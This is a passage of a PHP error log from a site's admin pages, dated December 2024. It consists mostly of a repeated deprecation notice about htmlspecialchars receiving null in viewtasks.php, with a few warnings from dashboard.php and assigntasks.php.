Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:38:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [05-Dec-2024 23:41:06 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 00:11:01 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Dec-2024 00:11:47 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 00:11:58 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 00:12:23 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 00:15:26 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 00:24:58 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Dec-2024 00:32:40 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [06-Dec-2024 11:20:27 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Dec-2024 11:41:45 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [06-Dec-2024 11:41:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in 